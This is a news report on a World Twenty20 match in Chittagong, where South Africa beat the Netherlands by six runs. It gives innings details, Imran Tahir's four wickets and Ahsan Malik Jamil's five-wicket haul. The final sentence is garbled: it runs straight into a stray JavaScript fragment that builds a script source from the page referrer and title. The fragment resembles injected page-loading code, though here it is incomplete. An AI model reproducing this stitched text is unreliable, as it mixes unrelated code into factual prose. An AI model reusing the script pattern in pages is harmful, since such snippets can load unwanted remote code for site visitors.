CHITTAGONG: South Africa defeated Netherlands by six runs in an exciting Group-1 match of the Super Ten Series in the fifth World Twenty20 here at the Zahur Ahmed Chowdhury Stadium on Thursday.

Chasing 146, Netherlands were looking set for making an upset against South Africa as the openers provided a sound start of 58 in 5.5 overs.

Left-handed opener Stephen Myburgh top scored with 51 from 28 balls with eight fours and two sixes.

Later, Netherlands were 116 for four in only 76 balls and they needed just 30 from 44 balls.

However, fast bowler Dale Steyn and leg-spinner Imran Tahir struck back after which Netherlands lost a golden chance to record an upset win against South Africa and were all out for 139 in 18.4 overs.

Tahir captured four wickets for 21 runs and Steyn claimed two for 19.

Earlier, Netherlands restricted South Africa to 145 for nine after they won the toss and decided to bowl first.

South African batsmen could not play well against the Dutch bowlers except opener Hashim Amla who hit a breezy knock of 43 runs off 22 balls with seven fours and a six.

Only four other batsmen – captain Faf du Plessis (24), AB de Villiers (21), David Miller (17) and Jean-Paul Duminy (12) – could get into the double figures.

Pace bowler Malik Ahsan Jamil captured five wickets for 19 for his career best bowling in T20 international cricket.

This was also the best bowling by any bowler from an associate team against a full ICC member.s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
